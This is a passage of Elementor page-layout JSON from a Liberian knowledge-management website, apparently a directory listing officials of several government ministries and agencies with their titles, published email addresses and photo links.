"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:jduolupeh@gmail.com\\\">jduolupeh@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/Halala.jpg\",\"id\":5086,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/ernest.jpg\",\"id\":5087,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd05ae4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/wonpue.jpg\",\"id\":5091,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"784af4b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/nadine.jpg\",\"id\":5093,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c9662e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/henry.jpg\",\"id\":5097,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine A\'jami<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a 